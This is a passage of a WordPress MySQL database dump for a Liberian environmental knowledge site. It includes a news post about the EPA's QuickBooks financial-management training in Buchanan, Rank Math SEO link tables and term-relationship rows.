EPA\'s mandate, particularly as the Agency continues to oversee a growing portfolio of national and international environmental programs.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>\"As the EPA continues to implement climate change adaptation initiatives, biodiversity conservation projects, pollution control programs, ecosystem restoration activities, and community resilience interventions, the need for robust financial controls and efficient resource management becomes increasingly important,\" he stated.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He noted that accountability, transparency, efficiency, and effective financial reporting are now indispensable requirements for public institutions and development projects worldwide.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>According to him, the adoption of modern financial management tools such as QuickBooks aligns the EPA with international best practices and strengthens the Agency\'s ability to manage resources effectively.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The EPA Deputy Executive Director stressed that the training goes beyond learning software applications and represents a significant step toward building a stronger and more resilient financial management framework within the EPA.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>\"This training is not simply about learning a software application. It is about strengthening institutional capacity, improving financial controls, reducing errors, enhancing reporting accuracy, and supporting evidence-based decision-making,\" Mr. Kollie told participants during the opening ceremony.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Mr. Kollie encouraged participants to take full advantage of the training by actively engaging in discussions, asking questions, and sharing experiences with facilitators and colleagues.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He also extended appreciation to the organizers, facilitators, and partners whose support made the workshop possible, noting that investments in capacity building remain essential for improving institutional performance and promoting excellence in public sector financial management.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The system is also expected to improve audit preparedness, facilitate compliance monitoring, and increase transparency in the utilization of donor and public funds.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The QuickBooks system will further enable project managers and financial officers to monitor expenditures more effectively, reconcile accounts promptly, track disbursements, and produce ective project implementation.</p>\n<!-- /wp:paragraph -->','EPA Strengthens Financial Accountability Through QuickBooks Capacity-Building Initiative in Buchanan','','publish','open','open','','epa-strengthens-financial-accountability-through-quickbooks-capacity-building-initiative-in-buchanan','','','2026-06-18 18:33:50','2026-06-18 18:33:50','',0,'https://ekmsliberia.info/?p=5986',1,'post','',0),(5987,38,'2026-06-18 18:32:26','2026-06-18 18:32:26','','today','','inherit','open','closed','','today-3','','','2026-06-18 18:32:26','2026-06-18 18:32:26','',5986,'https://ekmsliberia.info/wp-content/uploads/2026/06/today.jpeg',0,'attachment','image/jpeg',0),(5988,38,'2026-06-18 18:33:46','2026-06-18 18:33:46','<!-- wp:paragraph -->\n<p>Buchanan, Grand Bassa County – June 2026 – The Environmental Protection Agency (EPA) of Liberia has launched a four-day intensive QuickBooks Training Workshop aimed at strengthening financial accountability, transparency, and operational efficiency across the institution and its various donor-funded projects.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The training, currently underway in Buchanan City, Grand Bassa County, brings together finance officers, accountants, project administrators, approving officials, and key personnel from different departments and projects of the Agency.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The workshop is designed to equip participants with practical knowledge and skills in digital financial management, enabling them to accurately record transactions, monitor budgets, track expenditures, generate financial reports, and ensure compliance with both national financial regulations and donor requirements.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The initiative forms part of the EPA\'s broader efforts to modernize its financial management systems and promote responsible stewardship of public and development partner resources.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Speaking on behalf of the Executive Director of the Environmental Protection Agency of Liberia, Deputy Executive Director for Administration, Mr. Anthony S. Kollie, described the workshop as a timely and strategic investment in the Agency\'s institutional capacity.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Mr. Kollie emphasized that strong financial management systems are critical to achieving the EPA\'s mandate, particularly as the Agency continues to oversee a growing portfolio of national and international environmental programs.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>\"As the EPA continues to implement climate change adaptation initiatives, biodiversity conservation projects, pollution control programs, ecosystem restoration activities, and community resilience interventions, the need for robust financial controls and efficient resource management becomes increasingly important,\" he stated.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He noted that accountability, transparency, efficiency, and effective financial reporting are now indispensable requirements for public institutions and development projects worldwide.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>According to him, the adoption of modern financial management tools such as QuickBooks aligns the EPA with international best practices and strengthens the Agency\'s ability to manage resources effectively.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The EPA Deputy Executive Director stressed that the training goes beyond learning software applications and represents a significant step toward building a stronger and more resilient financial management framework within the EPA.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>\"This training is not simply about learning a software application. It is about strengthening institutional capacity, improving financial controls, reducing errors, enhancing reporting accuracy, and supporting evidence-based decision-making,\" Mr. Kollie told participants during the opening ceremony.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Mr. Kollie encouraged participants to take full advantage of the training by actively engaging in discussions, asking questions, and sharing experiences with facilitators and colleagues.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He also extended appreciation to the organizers, facilitators, and partners whose support made the workshop possible, noting that investments in capacity building remain essential for improving institutional performance and promoting excellence in public sector financial management.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The system is also expected to improve audit preparedness, facilitate compliance monitoring, and increase transparency in the utilization of donor and public funds.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The QuickBooks system will further enable project managers and financial officers to monitor expenditures more effectively, reconcile accounts promptly, track disbursements, and produce ective project implementation.</p>\n<!-- /wp:paragraph -->','EPA Strengthens Financial Accountability Through QuickBooks Capacity-Building Initiative in Buchanan','','inherit','closed','closed','','5986-revision-v1','','','2026-06-18 18:33:46','2026-06-18 18:33:46','',5986,'https://ekmsliberia.info/?p=5988',0,'revision','',0);
/*!40000 ALTER TABLE `wp_posts` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_rank_math_404_logs`
--

DROP TABLE IF EXISTS `wp_rank_math_404_logs`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_rank_math_404_logs` (
  `id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `uri` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL,
  `accessed` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `times_accessed` bigint(20) unsigned NOT NULL DEFAULT '1',
  `ip` varchar(50) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `referer` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `user_agent` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  PRIMARY KEY (`id`),
  KEY `uri` (`uri`(191))
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_rank_math_404_logs`
--

LOCK TABLES `wp_rank_math_404_logs` WRITE;
/*!40000 ALTER TABLE `wp_rank_math_404_logs` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_rank_math_404_logs` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_rank_math_internal_links`
--

DROP TABLE IF EXISTS `wp_rank_math_internal_links`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_rank_math_internal_links` (
  `id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `url` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL,
  `post_id` bigint(20) unsigned NOT NULL,
  `target_post_id` bigint(20) unsigned NOT NULL,
  `type` varchar(8) COLLATE utf8mb4_unicode_ci NOT NULL,
  PRIMARY KEY (`id`),
  KEY `link_direction` (`post_id`,`type`)
) ENGINE=MyISAM AUTO_INCREMENT=2582 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_rank_math_internal_links`
--

LOCK TABLES `wp_rank_math_internal_links` WRITE;
/*!40000 ALTER TABLE `wp_rank_math_internal_links` DISABLE KEYS */;
INSERT INTO `wp_rank_math_internal_links` VALUES (34,'https://ekmsliberia.info/',153,13,'internal'),(37,'http://www.wocintechchat.com/',13,0,'external'),(38,'https://www.iconfinder.com/iconsets/elpis',13,0,'external'),(1389,'https://ekmsliberia.info/',30,9,'internal'),(1390,'https://ekmsliberia.info/homepage/',30,13,'internal'),(1391,'https://ekmsliberia.info/multilateral-environmental-agreements/',30,84,'internal'),(1392,'https://ekmsliberia.info/conventions-topics/',30,87,'internal'),(1393,'https://ekmsliberia.info/institutions-resources/',30,89,'internal'),(1394,'https://ekmsliberia.info/documents-and-other-resources/',30,91,'internal'),(1395,'https://ekmsliberia.info/discussion-forum/',30,99,'internal'),(1396,'https://ekmsliberia.info/about/',30,68,'internal'),(1397,'https://ekmsliberia.info/contact/',30,80,'internal'),(1398,'https://ekmsliberia.info/country-profile/',30,76,'internal'),(1399,'https://ekmsliberia.info/blogs-news-and-stories/',30,82,'internal'),(1400,'https://ekmsliberia.info/frequently-asked-questions/',30,70,'internal'),(1401,'https://ekmsliberia.info/maps/',30,108,'internal'),(1402,'https://ekmsliberia.info/vacancy/',30,72,'internal'),(1403,'https://ekmsliberia.info/events/',30,110,'internal'),(1404,'https://ekmsliberia.info/homepage/',30,13,'internal'),(1405,'https://ekmsliberia.info/multilateral-environmental-agreements/',30,84,'internal'),(1406,'https://ekmsliberia.info/conventions-topics/',30,87,'internal'),(1407,'https://ekmsliberia.info/institutions-resources/',30,89,'internal'),(1408,'https://ekmsliberia.info/documents-and-other-resources/',30,91,'internal'),(1409,'https://ekmsliberia.info/discussion-forum/',30,99,'internal'),(1410,'https://ekmsliberia.info/about/',30,68,'internal'),(1411,'https://ekmsliberia.info/contact/',30,80,'internal'),(1412,'https://ekmsliberia.info/country-profile/',30,76,'internal'),(1413,'https://ekmsliberia.info/blogs-news-and-stories/',30,82,'internal'),(1414,'https://ekmsliberia.info/frequently-asked-questions/',30,70,'internal'),(1415,'https://ekmsliberia.info/maps/',30,108,'internal'),(1416,'https://ekmsliberia.info/vacancy/',30,72,'internal'),(1417,'https://ekmsliberia.info/events/',30,110,'internal'),(2534,'https://ekmsliberia.info/lorem-ipsum-dolor-sit-amet-consectetur/',9,336,'internal'),(2535,'https://ekmsliberia.info/lorem-ipsum-dolor-sit-amet-consectetur/',9,336,'internal'),(2536,'https://ekmsliberia.info/lorem-ipsum-dolor-sit-amet-consectetur/#respond',9,336,'internal'),(2537,'https://ekmsliberia.info/lorem-ipsum-dolor-sit-amet-consectetur/',9,336,'internal'),(2538,'https://ekmsliberia.info/cras-metus-sed-aliquet-risus-a-tortor-odio/',9,334,'internal'),(2539,'https://ekmsliberia.info/cras-metus-sed-aliquet-risus-a-tortor-odio/',9,334,'internal'),(2540,'https://ekmsliberia.info/cras-metus-sed-aliquet-risus-a-tortor-odio/#respond',9,334,'internal'),(2541,'https://ekmsliberia.info/cras-metus-sed-aliquet-risus-a-tortor-odio/',9,334,'internal'),(2542,'https://ekmsliberia.info/quis-ligula-lacinia-aliquet-mauris-ipsum/',9,335,'internal'),(2543,'https://ekmsliberia.info/quis-ligula-lacinia-aliquet-mauris-ipsum/',9,335,'internal'),(2544,'https://ekmsliberia.info/quis-ligula-lacinia-aliquet-mauris-ipsum/#respond',9,335,'internal'),(2545,'https://ekmsliberia.info/quis-ligula-lacinia-aliquet-mauris-ipsum/',9,335,'internal'),(2546,'https://ekmsliberia.info/pellentesque-nibh-aenean-in-scelerisque/',9,332,'internal'),(2547,'https://ekmsliberia.info/pellentesque-nibh-aenean-in-scelerisque/',9,332,'internal'),(2548,'https://ekmsliberia.info/pellentesque-nibh-aenean-in-scelerisque/#respond',9,332,'internal'),(2549,'https://ekmsliberia.info/pellentesque-nibh-aenean-in-scelerisque/',9,332,'internal'),(2550,'https://ekmsliberia.info/nulla-metus-metus-ullamcorper-vel-tincidunt/',9,333,'internal'),(2551,'https://ekmsliberia.info/nulla-metus-metus-ullamcorper-vel-tincidunt/',9,333,'internal'),(2552,'https://ekmsliberia.info/nulla-metus-metus-ullamcorper-vel-tincidunt/#respond',9,333,'internal'),(2553,'https://ekmsliberia.info/nulla-metus-metus-ullamcorper-vel-tincidunt/',9,333,'internal'),(2554,'https://ekmsliberia.info/lacinia-nunc-curabitur-tortor-pellentesque/',9,331,'internal'),(2555,'https://ekmsliberia.info/lacinia-nunc-curabitur-tortor-pellentesque/',9,331,'internal'),(2556,'https://ekmsliberia.info/lacinia-nunc-curabitur-tortor-pellentesque/#respond',9,331,'internal'),(2557,'https://ekmsliberia.info/lacinia-nunc-curabitur-tortor-pellentesque/',9,331,'internal'),(2558,'https://ekmsliberia.info/events/',9,110,'internal'),(2559,'https://ekmsliberia.info/maps/',9,108,'internal'),(2560,'https://ekmsliberia.info/terms-of-use/',9,106,'internal'),(2561,'https://ekmsliberia.info/disclaimer/',9,104,'internal'),(2562,'https://ekmsliberia.info/cookies-privacy-policy/',9,102,'internal'),(2563,'https://ekmsliberia.info/discussion-forum/',9,99,'internal'),(2564,'https://ekmsliberia.info/ministry-of-agriculture/',9,97,'internal'),(2565,'https://ekmsliberia.info/forestry-development-authority/',9,95,'internal'),(2566,'https://ekmsliberia.info/environmental-protection-agency/',9,93,'internal'),(2567,'https://ekmsliberia.info/documents-and-other-resources/',9,91,'internal'),(2580,'https://ekmsliberia.info',102,0,'external'),(2581,'mailto:contact@ekmsliberia.info',102,0,'external');
/*!40000 ALTER TABLE `wp_rank_math_internal_links` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_rank_math_internal_meta`
--

DROP TABLE IF EXISTS `wp_rank_math_internal_meta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_rank_math_internal_meta` (
  `object_id` bigint(20) unsigned NOT NULL,
  `internal_link_count` int(10) unsigned DEFAULT '0',
  `external_link_count` int(10) unsigned DEFAULT '0',
  `incoming_link_count` int(10) unsigned DEFAULT '0',
  UNIQUE KEY `object_id` (`object_id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_rank_math_internal_meta`
--

LOCK TABLES `wp_rank_math_internal_meta` WRITE;
/*!40000 ALTER TABLE `wp_rank_math_internal_meta` DISABLE KEYS */;
INSERT INTO `wp_rank_math_internal_meta` VALUES (9,34,0,1),(13,0,2,3),(22,0,0,0),(23,0,0,0),(24,0,0,0),(25,0,0,0),(26,0,0,0),(27,0,0,0),(28,0,0,0),(29,0,0,0),(30,29,0,0),(31,0,0,0),(32,0,0,0),(33,0,0,0),(34,0,0,0),(35,0,0,0),(36,0,0,0),(37,0,0,0),(38,0,0,0),(39,0,0,0),(40,0,0,0),(41,0,0,0),(42,0,0,0),(43,0,0,0),(44,0,0,0),(45,0,0,0),(68,0,0,2),(70,0,0,2),(72,0,0,2),(74,0,0,0),(76,0,0,2),(78,0,0,0),(80,0,0,2),(82,0,0,2),(84,0,0,2),(87,0,0,2),(89,0,0,2),(91,0,0,3),(93,0,0,1),(95,0,0,1),(97,0,0,1),(99,0,0,3),(102,0,2,1),(104,0,0,1),(106,0,0,1),(108,0,0,3),(110,0,0,3),(113,0,0,0),(153,1,0,0),(159,0,0,0),(171,0,0,0),(173,0,0,0),(176,0,0,0),(177,0,0,0),(281,0,0,0),(282,0,0,0),(283,0,0,0),(285,0,0,0),(286,0,0,0),(287,0,0,0),(288,0,0,0),(289,0,0,0),(290,0,0,0),(291,0,0,0),(315,0,0,0),(316,0,0,0),(317,0,0,0),(318,0,0,0),(319,0,0,0),(324,0,0,0),(326,0,0,0),(327,0,0,0),(328,0,0,0),(329,0,0,0),(330,0,0,0),(331,0,0,4),(332,0,0,4),(333,0,0,4),(334,0,0,4),(335,0,0,4),(336,0,0,4),(347,0,0,0),(349,0,0,0),(391,0,0,0),(397,0,0,0);
/*!40000 ALTER TABLE `wp_rank_math_internal_meta` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_rank_math_redirections`
--

DROP TABLE IF EXISTS `wp_rank_math_redirections`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_rank_math_redirections` (
  `id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `sources` text CHARACTER SET utf8mb4 COLLATE utf8mb4_bin NOT NULL,
  `url_to` text COLLATE utf8mb4_unicode_ci NOT NULL,
  `header_code` smallint(4) unsigned NOT NULL,
  `hits` bigint(20) unsigned NOT NULL DEFAULT '0',
  `status` varchar(25) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT 'active',
  `created` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `updated` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `last_accessed` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  PRIMARY KEY (`id`),
  KEY `status` (`status`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_rank_math_redirections`
--

LOCK TABLES `wp_rank_math_redirections` WRITE;
/*!40000 ALTER TABLE `wp_rank_math_redirections` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_rank_math_redirections` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_rank_math_redirections_cache`
--

DROP TABLE IF EXISTS `wp_rank_math_redirections_cache`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_rank_math_redirections_cache` (
  `id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `from_url` text CHARACTER SET utf8mb4 COLLATE utf8mb4_bin NOT NULL,
  `redirection_id` bigint(20) unsigned NOT NULL,
  `object_id` bigint(20) unsigned NOT NULL DEFAULT '0',
  `object_type` varchar(10) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT 'post',
  `is_redirected` tinyint(1) NOT NULL DEFAULT '0',
  PRIMARY KEY (`id`),
  KEY `redirection_id` (`redirection_id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_rank_math_redirections_cache`
--

LOCK TABLES `wp_rank_math_redirections_cache` WRITE;
/*!40000 ALTER TABLE `wp_rank_math_redirections_cache` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_rank_math_redirections_cache` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_rank_math_sc_analytics`
--

DROP TABLE IF EXISTS `wp_rank_math_sc_analytics`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_rank_math_sc_analytics` (
  `id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `date` datetime NOT NULL,
  `property` text COLLATE utf8mb4_unicode_ci NOT NULL,
  `clicks` mediumint(6) NOT NULL,
  `impressions` mediumint(6) NOT NULL,
  `position` double NOT NULL,
  `ctr` double NOT NULL,
  `dimension` varchar(25) COLLATE utf8mb4_unicode_ci NOT NULL,
  PRIMARY KEY (`id`),
  KEY `property` (`property`(191))
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_rank_math_sc_analytics`
--

LOCK TABLES `wp_rank_math_sc_analytics` WRITE;
/*!40000 ALTER TABLE `wp_rank_math_sc_analytics` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_rank_math_sc_analytics` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_term_relationships`
--

DROP TABLE IF EXISTS `wp_term_relationships`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_term_relationships` (
  `object_id` bigint(20) unsigned NOT NULL DEFAULT '0',
  `term_taxonomy_id` bigint(20) unsigned NOT NULL DEFAULT '0',
  `term_order` int(11) NOT NULL DEFAULT '0',
  PRIMARY KEY (`object_id`,`term_taxonomy_id`),
  KEY `term_taxonomy_id` (`term_taxonomy_id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_term_relationships`
--

LOCK TABLES `wp_term_relationships` WRITE;
/*!40000 ALTER TABLE `wp_term_relationships` DISABLE KEYS */;
INSERT INTO `wp_term_relationships` VALUES (114,2,0),(115,2,0),(116,2,0),(117,2,0),(118,2,0),(120,2,0),(123,2,0),(124,2,0),(125,2,0),(126,2,0),(127,2,0),(129,2,0),(404,2,0),(467,67,0),(467,73,0),(467,174,0),(468,67,0),(468,73,0),(468,174,0),(469,67,0),(469,73,0),(469,174,0),(470,67,0),(470,73,0),(470,174,0),(471,67,0),(471,73,0),(471,174,0),(472,67,0),(472,73,0),(472,174,0),(473,67,0),(473,73,0),(473,174,0),(474,68,0),(474,73,0),(474,175,0),(474,176,0),(476,68,0),(476,73,0),(476,176,0),(477,68,0),(477,73,0),(477,176,0),(478,68,0),(478,73,0),(478,176,0),(479,69,0),(479,73,0),(479,175,0),(480,69,0),(480,73,0),(480,175,0),(481,69,0),(481,73,0),(481,175,0),(482,69,0),(482,73,0),(482,175,0),(483,69,0),(483,73,0),(483,175,0),(484,69,0),(484,73,0),(484,175,0),(485,69,0),(485,73,0),(485,175,0),(486,69,0),(486,73,0),(486,175,0),(487,69,0),(487,73,0),(487,175,0),(488,69,0),(488,73,0),(488,175,0),(570,52,0),(570,70,0),(570,88,0),(1544,162,0),(1582,162,0),(1584,162,0),(1586,162,0),(1588,162,0),(1590,162,0),(1592,162,0),(1594,162,0),(1596,162,0),(1598,162,0),(1600,162,0),(1602,162,0),(1604,162,0),(1606,162,0),(1608,162,0),(1610,162,0),(1612,163,0),(1614,163,0),(1695,52,0),(1695,70,0),(1695,86,0),(1697,53,0),(1697,70,0),(1697,85,0),(1699,52,0),(1699,53,0),(1699,70,0),(1699,79,0),(1701,60,0),(1701,70,0),(1701,85,0),(1703,53,0),(1703,70,0),(1703,88,0),(1705,60,0),(1705,70,0),(1705,85,0),(1707,53,0),(1707,70,0),(1707,85,0),(1709,52,0),(1709,70,0),(1709,86,0),(1711,60,0),(1711,70,0),(1711,85,0),(1713,53,0),(1713,70,0),(1713,85,0),(1715,61,0),(1715,70,0),(1715,85,0),(1718,52,0),(1718,70,0),(1718,161,0),(1720,53,0),(1720,70,0),(1720,85,0),(1722,52,0),(1722,70,0),(1722,85,0),(1724,61,0),(1724,65,0),(1724,70,0),(1724,85,0),(1726,61,0),(1726,65,0),(1726,70,0),(1726,85,0),(1728,57,0),(1728,70,0),(1728,85,0),(1730,57,0),(1730,85,0),(1732,52,0),(1732,70,0),(1732,86,0),(1734,57,0),(1734,70,0),(1734,86,0),(1737,61,0),(1737,70,0),(1737,85,0),(1739,61,0),(1739,70,0),(1739,85,0),(1741,61,0),(1741,70,0),(1741,85,0),(1743,61,0),(1743,70,0),(1743,76,0),(1743,86,0),(1745,61,0),(1745,70,0),(1745,86,0),(1747,52,0),(1747,70,0),(1747,86,0),(1747,89,0),(1749,52,0),(1749,60,0),(1749,70,0),(1749,76,0),(1749,86,0),(1751,52,0),(1751,70,0),(1751,76,0),(1751,86,0),(1761,120,0),(1762,120,0),(1763,121,0),(1764,121,0),(1766,61,0),(1766,70,0),(1766,85,0),(1766,88,0),(1768,61,0),(1768,70,0),(1768,85,0),(1768,86,0),(1770,61,0),(1770,85,0),(1770,88,0),(1772,61,0),(1772,70,0),(1772,86,0),(1774,61,0),(1774,85,0),(1774,88,0),(1776,52,0),(1776,70,0),(1776,78,0),(1778,52,0),(1778,70,0),(1778,78,0),(1780,52,0),(1780,70,0),(1780,78,0),(1782,52,0),(1782,70,0),(1782,79,0),(1782,82,0),(1787,122,0),(1788,122,0),(1790,122,0),(1791,120,0),(1842,2,0),(1843,6,0),(1844,6,0),(1845,6,0),(1846,6,0),(1870,67,0),(1872,68,0),(1877,69,0),(1912,6,0),(1913,122,0),(1937,5,0),(1939,5,0),(2063,52,0),(2063,70,0),(2063,85,0),(2078,133,0),(2079,133,0),(2080,133,0),(2081,133,0),(2082,133,0),(2083,134,0),(2084,134,0),(2085,134,0),(2086,134,0),(2087,134,0),(2127,135,0),(2128,135,0),(2148,52,0),(2148,70,0),(2148,85,0),(2150,53,0),(2150,70,0),(2150,85,0),(2152,52,0),(2152,70,0),(2152,85,0),(2154,52,0),(2154,70,0),(2154,85,0),(2156,52,0),(2156,70,0),(2156,86,0),(2159,52,0),(2159,70,0),(2159,88,0),(2161,52,0),(2161,85,0),(2165,52,0),(2165,70,0),(2165,85,0),(2165,86,0),(2178,60,0),(2178,70,0),(2178,85,0),(2215,137,0),(2216,137,0),(2217,138,0),(2218,138,0),(2219,139,0),(2248,52,0),(2248,70,0),(2248,86,0),(2252,52,0),(2252,70,0),(2252,86,0),(2274,140,0),(2275,140,0),(2284,141,0),(2285,136,0),(2286,136,0),(2291,142,0),(2292,142,0),(2293,52,0),(2293,70,0),(2293,84,0),(2296,52,0),(2296,84,0),(2297,57,0),(2297,70,0),(2297,86,0),(2309,52,0),(2309,70,0),(2309,85,0),(2457,162,0),(2464,167,0),(2465,167,0),(2466,167,0),(2509,2,0),(2558,60,0),(2558,71,0),(2558,175,0),(2596,2,0),(2597,122,0),(2599,140,0),(2600,140,0),(2602,139,0),(2609,53,0),(2609,70,0),(2609,85,0),(2609,174,0),(2617,53,0),(2617,71,0),(2617,174,0),(2621,177,0),(2624,177,0),(2658,52,0),(2658,70,0),(2658,76,0),(2658,174,0),(2658,175,0),(2658,178,0),(2668,179,0),(2669,179,0),(2675,180,0),(2676,180,0),(2680,181,0),(2684,182,0),(2688,183,0),(2690,184,0),(2695,185,0),(2698,186,0),(2702,133,0),(2703,187,0),(2704,162,0),(2746,2,0),(2747,6,0),(2748,50,0),(2748,71,0),(2748,175,0),(2751,50,0),(2751,71,0),(2751,175,0),(2751,209,0),(2769,164,0),(2775,70,0),(2775,174,0),(2775,175,0),(2775,176,0),(2775,210,0),(2778,211,0),(2801,143,0),(2801,171,0),(2801,172,0),(2801,173,0),(2801,189,0),(2804,143,0),(2804,171,0),(2804,190,0),(2809,143,0),(2809,171,0),(2809,190,0),(2813,143,0),(2813,173,0),(2813,200,0),(2854,177,0),(2911,143,0),(2956,143,0),(2956,144,0),(2956,189,0),(2956,190,0),(2964,163,0),(2965,163,0),(2989,58,0),(2989,70,0),(2989,88,0),(2991,52,0),(2991,70,0),(2991,71,0),(2991,86,0),(2991,209,0),(2993,52,0),(2993,86,0),(2993,175,0),(3004,163,0),(3005,163,0),(3006,165,0),(3023,143,0),(3027,143,0),(3030,143,0),(3034,143,0),(3038,143,0),(3041,165,0),(3045,143,0),(3060,143,0),(3060,189,0),(3063,143,0),(3063,189,0),(3066,143,0),(3066,189,0),(3069,143,0),(3069,189,0),(3072,143,0),(3079,54,0),(3079,86,0),(3079,174,0),(3083,163,0),(3087,52,0),(3087,70,0),(3087,86,0),(3087,174,0),(3087,175,0),(3087,176,0),(3090,143,0),(3090,189,0),(3092,70,0),(3092,86,0),(3092,174,0),(3092,176,0),(3092,223,0),(3096,70,0),(3096,86,0),(3096,174,0),(3096,175,0),(3096,176,0),(3096,223,0),(3097,70,0),(3097,86,0),(3097,174,0),(3097,175,0),(3097,176,0),(3097,223,0),(3102,56,0),(3102,70,0),(3102,86,0),(3102,175,0),(3104,56,0),(3104,61,0),(3104,70,0),(3104,86,0),(3104,175,0),(3107,56,0),(3107,70,0),(3107,86,0),(3107,175,0),(3107,224,0),(3109,61,0),(3109,70,0),(3109,86,0),(3109,175,0),(3117,143,0),(3117,189,0),(3124,143,0),(3124,189,0),(3127,143,0),(3127,189,0),(3226,54,0),(3226,70,0),(3226,71,0),(3226,86,0),(3226,174,0),(3226,209,0),(3229,54,0),(3229,70,0),(3229,174,0),(3229,176,0),(3229,225,0),(3240,52,0),(3240,70,0),(3240,225,0),(3243,52,0),(3243,175,0),(3243,225,0),(3245,52,0),(3245,174,0),(3245,225,0),(3247,52,0),(3247,225,0),(3249,52,0),(3249,175,0),(3249,225,0),(3251,52,0),(3251,174,0),(3251,225,0),(3253,52,0),(3253,225,0),(3257,52,0),(3257,174,0),(3257,225,0),(3259,52,0),(3259,175,0),(3259,225,0),(3261,52,0),(3261,70,0),(3261,174,0),(3261,225,0),(3263,52,0),(3263,175,0),(3263,225,0),(3265,52,0),(3265,175,0),(3265,225,0),(3267,52,0),(3267,175,0),(3267,225,0),(3269,52,0),(3269,225,0),(3271,52,0),(3271,78,0),(3271,176,0),(3271,225,0),(3273,52,0),(3273,175,0),(3273,225,0),(3275,52,0),(3275,176,0),(3275,225,0),(3278,52,0),(3278,86,0),(3278,175,0),(3280,52,0),(3280,86,0),(3280,175,0),(3282,52,0),(3282,86,0),(3285,52,0),(